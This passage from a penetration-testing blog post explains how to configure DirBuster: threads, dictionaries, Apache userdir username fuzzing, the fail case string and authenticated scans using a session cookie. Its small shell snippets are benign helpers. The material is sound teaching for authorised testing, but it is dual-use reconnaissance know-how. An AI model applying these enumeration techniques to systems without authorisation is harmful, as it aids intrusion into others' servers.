<p>For the &#8220;Target URL&#8221; consider HTTP vs HTTPS. HTTP is obviously faster but a website will often redirect some or all requests to the HTTPS equivalent whether the page is actually there or not, which will spoil your results. You can enable &#8220;Follow Redirects&#8221; from the Options menu but that&#8217;s a considerable overhead if it&#8217;s happening with every request. If the redirect happens only when the page exists then a HTTP-based scan should be speedier. My personal preference is that if the site is happy serving the same pages over HTTPS, which is normal, I&#8217;ll go for HTTPS. Despite the overhead slowing down the request rate, it does tend to rule out excessive redirects since it would be unusual for a HTTPS request to be redirected to a HTTP equivalent. Redirects may also confuse the &#8220;fail case&#8221;, which DirBuster uses to decide whether or not a guess is correct, which could lead to false negatives as well as false positives. More on this later.</p>
<p>A similar situation may arise with the <em>domain</em> in that <span style="text-decoration: underline;">https://site.com/page</span> may always redirect to <span style="text-decoration: underline;">https://<strong>www</strong>.site.com/page</span> so use <span style="text-decoration: underline;">https://www.site.com:443</span> as your base URL.</p>
<h3>Work Method</h3>
<p>The default &#8220;Auto Switch&#8221; mode is probably best for the majority of cases. DirBuster will first try to see if it can get sensible results from HEAD requests, the reason being that the responses are smaller. Even though it follows up with a GET when a HEAD returns 200, this saves time when the 404 message (or equivalent) is relatively large. On the site I was looking at when writing this bit, the full HTML 404 response was about 19kB bigger than the disembodied set of 404 headers you&#8217;d get with HEAD. A crude bit of testing showed this took on average twice as long to arrive and be processed, adding 200ms to the response time. Given that you&#8217;re getting 404s most of the time, this could mean a saving, even with the small dictionary, of over 1.4 gigabytes or 4 hours of waiting!</p>
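<p>As a sanity check of those numbers, here&#8217;s the back-of-the-envelope arithmetic, using the figures above (81,629 entries in the small lowercase list, roughly 19kB and 200ms saved per 404):</p>

```shell
# Rough saving from HEAD vs GET across a whole scan, per the figures above
entries=81629        # directory-list-lowercase-2.3-small.txt
kb_per_404=19        # extra size of the full HTML 404 body vs headers only
ms_per_404=200       # extra time per GET observed in the crude test

gb=$(awk -v e="$entries" -v k="$kb_per_404" 'BEGIN { printf "%.2f", e * k / 1024 / 1024 }')
hours=$(awk -v e="$entries" -v m="$ms_per_404" 'BEGIN { printf "%.2f", e * m / 1000 / 3600 }')
echo "Saved: ${gb} GB and ${hours} hours"
```

Which comes out at roughly 1.48 GB and 4.5 hours, consistent with the claim above.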
<h3>Number Of Threads</h3>
<p>Running DirBuster with a high number of threads can slow down the target server, which may not go down too well if you&#8217;re testing a live site. You&#8217;ll probably find the default (10) to be a little over-enthusiastic, especially as you&#8217;ll be running other tests simultaneously. If you examine the number of threads in the DirBuster process (javaw.exe) while it&#8217;s running, you&#8217;ll see it jump up by more than the number you set in this field. I haven&#8217;t looked at the source code but I&#8217;m assuming that DirBuster is indeed honouring this field. I imagine that the &#8220;number of threads&#8221; refers to &#8220;Workers&#8221; that handle the actual requests and responses over the network while the other threads, for example, manage different queues depending on what you tick at the bottom of the screen.</p>
<p><span style="line-height: 1.714285714; font-size: 1rem;">As an aside, I&#8217;ve noticed that when you run a number of scans without re-starting DirBuster, the number of threads at rest tends to increase. I&#8217;m not sure if this is an issue that could degrade performance but just bear it in mind. </span><span style="line-height: 1.714285714; font-size: 1rem;">(I did try to contact the project lead, James Fisher, to ask about threading but I got no reply. And it&#8217;s not that big a deal to warrant rummaging through the source code!)</span></p>
<p>I have DirBuster running on another monitor so I can keep an eye on the requests per second and any sudden scrolling, which usually means errors! Bear in mind that, say, 20 requests per second over HTTP<strong>S</strong> will be working the server harder than 20 requests per second over HTTP. A nice feature is that once the scan is running, you can dynamically change the number of threads.</p>
<h3>Dictionary</h3>
<p>Assuming you opt for &#8220;List based brute force&#8221; you&#8217;ll now need to choose a dictionary &#8211; and for this you need to know whether or not your directories are case sensitive. Although you can often guess this from the server in use, e.g. IIS isn&#8217;t case sensitive, it&#8217;s always best to check. So test a page that you know to exist, i.e. does <code>/page</code> return the same as <code>/Page</code>? Even when the server is case-sensitive, a look over the site map in your web proxy may show that all the pages you&#8217;ve requested are in fact lower case. But don&#8217;t go thinking that using the case-sensitive lists will take all that much longer. Clicking &#8220;List Info&#8221; brings up some statistics on the dictionaries, a portion of which is shown below:</p>
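<p>A quick way to do that site-map check: export the observed paths from your proxy to a text file and look for uppercase letters. A minimal sketch &#8211; the file name and sample paths here are invented:</p>

```shell
# Hypothetical list of paths exported from your proxy's site map
cat > observed-paths.txt <<'EOF'
/login
/account/settings
/Images/logo.png
/js/app.js
EOF

# If any observed path contains an uppercase letter, the lowercase-only
# lists risk missing content; otherwise they are probably good enough
if grep -q '[A-Z]' observed-paths.txt; then
  echo "Mixed case in use - prefer the case-sensitive lists"
else
  echo "All lower case - the lowercase lists should be fine"
fi
```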
<p><a href="http://www.exploresecurity.com/wp-content/uploads/2014/07/DirBuster-dict-list-info.png"><img class="aligncenter size-full wp-image-187" alt="DirBuster dict list info" src="http://www.exploresecurity.com/wp-content/uploads/2014/07/DirBuster-dict-list-info.png" width="531" height="354" /></a></p>
<p>You can see that the case-sensitive lists are nowhere near even twice the size of the lowercase versions, which you might have imagined as a minimum. That&#8217;s because the lists are based on <em>real</em> names found by crawling the internet. The file &#8220;directory-list-2.3-small.txt&#8221; has 87,650 entries while the lowercase version has 81,629 entries so it&#8217;s only 6,021 entries longer (about 7% bigger). For the medium-sized lists the numbers are 220,546 vs 207,629 so the case-sensitive version is 12,917 entries longer (about 6% bigger). So using the case-sensitive lists may not involve as big a hit as you might expect. (You can also see from the List Info what the actual difference is between big, medium and little: the entries were found on at least 1, 2 and 3 hosts respectively.)</p>
<p>Before you even start your attack you could consider putting together a small dictionary of a few directories and files you&#8217;ve found, together with some gibberish entries, to use on a test run. If you don&#8217;t see the results you expect, review your configuration bearing in mind some of the points from this article. A short test run might save you hours of wasted effort.</p>
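<p>One way to knock together such a test dictionary &#8211; a sketch, assuming <code>admin</code>, <code>images</code> and <code>login</code> are names you&#8217;ve already seen on the site:</p>

```shell
# Build a six-entry test dictionary: three known-good names plus three
# random strings that should definitely come back as 404s
{
  printf '%s\n' admin images login
  for i in 1 2 3; do
    head -c 16 /dev/urandom | md5sum | cut -c1-12
  done
} > test-dict.txt

wc -l < test-dict.txt
```

If the test run doesn&#8217;t report exactly the three real entries as found, something in your configuration (fail case, redirects, extensions) needs another look.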
<h3>Starting options</h3>
<p>The &#8220;Standard start point&#8221; will assume directories end with / and files end with whatever you configure underneath. The &#8220;URL Fuzz&#8221; option allows you to insert the dictionary entries into the URL in a non-standard way. A good illustration is to discuss why there&#8217;s an Apache user enumeration list included in the set of dictionaries (apache-user-enum-2.0.txt). This is because if the <code>userdir</code> module is enabled (more on this <a href="http://httpd.apache.org/docs/2.4/mod/mod_userdir.html">here</a>) you can go hunting for usernames based on the fact that the user &#8220;bob&#8221; will have a folder mapped to <span style="text-decoration: underline;">http://site.com/~bob/</span>. So in this example the URL to fuzz would be <code>/~{dir}/</code> where <code>{dir}</code> is a placeholder for the words in the chosen dictionary.</p>
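<p>To see what the fuzz expansion produces, here&#8217;s the substitution spelt out in shell &#8211; the three usernames are invented stand-ins for the real apache-user-enum-2.0.txt entries:</p>

```shell
# Mimic DirBuster's URL Fuzz: substitute each dictionary word for {dir}
# in the fuzz template /~{dir}/
printf '%s\n' bob alice www > users.txt

while read -r word; do
  echo "/~${word}/"
done < users.txt
```

This prints <code>/~bob/</code>, <code>/~alice/</code> and <code>/~www/</code> &#8211; exactly the requests DirBuster would send.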
<p>The remaining options are self-explanatory but there are still a few things to consider. Obviously the more options you tick the longer the scan will take. So look first at the style of URL the website uses. For example, you might find that requests to <code>/page</code> produce redirects to <code>/page/</code> or that both of these return the same response. Either way, don&#8217;t run &#8220;Brute Force Dirs&#8221; together with &#8220;Brute Force Files&#8221; + &#8220;Use Blank Extension&#8221; because you&#8217;re doing twice the amount of work to get the same result. Conversely, if the site doesn&#8217;t seem to make much use of directory-style URLs, i.e. none of the pages end with a / character, then don&#8217;t run &#8220;Brute Force Dirs&#8221;; rely on &#8220;Brute Force Files&#8221; instead.</p>
<p>If you enable the &#8220;Be Recursive&#8221; option, remember that DirBuster&#8217;s multi-threaded approach means that all those queues of work will be competing for a limited set of Workers. It&#8217;s easy to get into a situation where the Workers are looking in sub-folders of no real interest, slowing down the search for better candidates. In a time-limited test you could try looking at just the root content first by disabling this option. Where you go from there can be both manual and automated &#8211; and there&#8217;s always the option to create a custom dictionary for further scans based on the results of the first scan.</p>
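<p>For instance, a focused second-scan dictionary can be seeded from the directories the first scan found. A sketch &#8211; the results file and its contents are invented, standing in for a plain list report from the first run:</p>

```shell
# Hypothetical paths reported by a first, non-recursive scan
cat > first-scan-found.txt <<'EOF'
/admin/
/admin/login.php
/images/
/js/app.js
EOF

# Keep only the directories (entries ending in /) as targets for a
# deeper, deliberately scoped second scan
grep '/$' first-scan-found.txt | sort -u > second-scan-dirs.txt
cat second-scan-dirs.txt
```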
<h3>Options Menu</h3>
<p><a href="http://www.exploresecurity.com/wp-content/uploads/2014/07/DirBuster-options.png"><img class="aligncenter size-full wp-image-189" alt="DirBuster options" src="http://www.exploresecurity.com/wp-content/uploads/2014/07/DirBuster-options.png" width="309" height="246" /></a></p>
<p>I&#8217;ve already mentioned &#8220;Follow Redirects&#8221; &#8211; in general, tick this only if you have to because it has the capacity to slow down the scan. Without this ticked, you&#8217;ll see 301 and 302 responses in the final results and you can just manually target the ones of interest later.</p>
<p>Choosing &#8220;Debug Mode&#8221; will only make a difference if you&#8217;re launching DirBuster from a command window that remains open in the background:</p>
<p><a href="http://www.exploresecurity.com/wp-content/uploads/2014/07/DirBuster-debug.png"><img class="aligncenter size-full wp-image-186" alt="DirBuster debug" src="http://www.exploresecurity.com/wp-content/uploads/2014/07/DirBuster-debug.png" width="736" height="264" /></a></p>
<p>The references to Worker[n] are to the threads doing the networking so for n threads that you set you&#8217;ll see Workers from [0] to [n-1].</p>
<p>The option &#8220;Parse HTML&#8221;, which is on by default, instructs DirBuster to read the HTML of files that it discovers, looking for files and folders it then doesn&#8217;t have to guess. These can be found, for example, in the <code>href</code> attributes of <code>&lt;a&gt;</code> tags. You might decide this is overkill since DirBuster will quickly begin to download a lot of content you&#8217;ll see elsewhere during testing, e.g. in Burp&#8217;s Proxy and Site Map. Overall this may add an overhead for results you simply don&#8217;t need &#8211; at least not from this tool on the first scan. There&#8217;s another possible benefit to disabling this when running authenticated scans, which we&#8217;ll come to shortly.</p>
<h3>Advanced Options</h3>
<p><a href="http://www.exploresecurity.com/wp-content/uploads/2014/07/DirBuster-advanced-options.png"><img class="aligncenter size-full wp-image-185" alt="DirBuster advanced options" src="http://www.exploresecurity.com/wp-content/uploads/2014/07/DirBuster-advanced-options.png" width="620" height="626" /></a></p>
<p>I&#8217;ll skip the first two tabs, which are self-explanatory, and start with the tab that&#8217;s active in the screenshot above&#8230;</p>
<h4>Http Options</h4>
<p>First, DirBuster allows you to add custom headers to your requests so you could, for example, add an authenticated session management cookie. <em>Whoa! Did you say run an automated scanning tool authenticated?</em> Yes I did. After getting a feel for the site you may be comfortable doing this &#8211; it can pull out some interesting finds (as shown by the case studies at the start of this article). Anything you find authenticated that you didn&#8217;t find unauthenticated is well worth a look. Although the risk of side effects is much lower than running a full-on active web application scanner authenticated across a site, of course I have to say that it&#8217;s not without risk! I disable &#8220;Parse HTML&#8221; and &#8220;Be Recursive&#8221; as a safety measure.</p>
<p>Underneath is the &#8220;Http User Agent&#8221; and you can see the default looks nothing like a real User-Agent string. If you&#8217;re getting odd results from DirBuster that you&#8217;re not seeing in Burp, you could try changing that option, e.g. to &#8220;Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0&#8221;.</p>
<p>Lastly, the option to use a proxy is useful for troubleshooting &#8211; as well as learning! You could also take advantage of your upstream proxy&#8217;s features to handle more complex cases (adding an overhead, of course).</p>
<h4><span style="line-height: 1.714285714; font-size: 1rem;">Scan Options</span></h4>
<p><a href="http://www.exploresecurity.com/wp-content/uploads/2014/07/DirBuster-Advanced-Options-Scan-Options.png"><img class="aligncenter size-full wp-image-190" alt="DirBuster Advanced Options - Scan Options" src="http://www.exploresecurity.com/wp-content/uploads/2014/07/DirBuster-Advanced-Options-Scan-Options.png" width="549" height="163" /></a></p>
<p>Here lies the all-important &#8220;Fail Case String&#8221;, which by default is &#8220;thereIsNoWayThat-You-CanBeThere&#8221;. The response from this page is used to determine whether or not a guessed page/directory is there, so it&#8217;s critical to the success of the scan. In fact DirBuster will request it often &#8211; once for every file type in every directory that it finds. So starting from / with all the scan options enabled (directories, files, recursive and blank), having found <code>/admin/users/</code>, for example, DirBuster will request:</p>
<p><code>/admin/users/thereIsNoWayThat-You-CanBeThere/<br />
/admin/users/thereIsNoWayThat-You-CanBeThere<br />
/admin/users/thereIsNoWayThat-You-CanBeThere.php</code></p>
<p>If you&#8217;re getting strange results from DirBuster, consider changing this string. It may even be worth getting into the habit of manually testing the fail case string as a directory and page before you start a lengthy scan.</p>
<h4>DirBuster Options</h4>
<p><a href="http://www.exploresecurity.com/wp-content/uploads/2014/07/DirBuster-Advanced-Options-Options.png"><img class="aligncenter size-full wp-image-192" alt="DirBuster Advanced Options - Options" src="http://www.exploresecurity.com/wp-content/uploads/2014/07/DirBuster-Advanced-Options-Options.png" width="593" height="219" /></a>The last tab serves as a reminder that most of the Options and Advanced Options discussed above get reset when you re-start DirBuster. Apart from the defaults listed in this tab &#8211; the number of threads, dictionary and file extensions, which are pre-populated when you start DirBuster from fresh &#8211; only the proxy settings persist. Although you&#8217;ll lose many of your options on restart, being forced to reconsider them maybe isn&#8217;t such a bad thing.</p>
<h2>And finally</h2>
<p>It&#8217;s worth starting DirBuster relatively early on in the test because it can take a while to complete, and obviously you want some time left over to explore anything interesting it finds. Keep an eye on the results while it&#8217;s running to make sure you&#8217;re getting something sensible &#8211; and that you&#8217;re not causing a slew of 500 errors. Version 1.0 RC1 will pause automatically after 20 <em>consecutive</em> errors, but those are <em>client-side</em> errors, not 500 responses. Equally, if you&#8217;re getting mostly redirects, try altering your parameters or, as a last resort, enable the &#8220;Follow Redirects&#8221; option.</p>
<p>Despite &#8211; or because of &#8211; your efforts to optimise your scan, you can often get a large number of hits. On the reporting side, the CSV option is useful because you get the Location, Response Code and Content Length on one line so you can quickly begin to process this and weed out the cruft.</p>
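<p>For instance, a one-liner can cut the CSV down to just the 200 responses. The sample data below is made up, and the column order (location, code, length) is assumed from the description above &#8211; check the header row of your actual report:</p>

```shell
# Fabricated results in the assumed location,code,length format
cat > dirbuster-report.csv <<'EOF'
/admin/,200,4523
/backup/,403,1203
/old/,301,0
/test/,200,4523
EOF

# Show only the hits, with their sizes (identical content lengths often
# mean identical pages - more cruft to weed out)
awk -F, '$2 == 200 { print $1 " (" $3 " bytes)" }' dirbuster-report.csv
```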
<p>Finally, note that you can invoke a command line interface by running DirBuster in headless mode. Check out the options with <code>java -jar &lt;DirBuster_jar_file&gt; -h</code>. The parameters don&#8217;t comprehensively match the GUI options, though, so if you need a command-line scanner of this type and DirBuster isn&#8217;t up to the job, try <code>dirb</code> (on Kali).</p>
]]></content:encoded>
			<wfw:commentRss>http://www.exploresecurity.com/three-cheers-for-dirbuster/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
	</channel>
</rss>
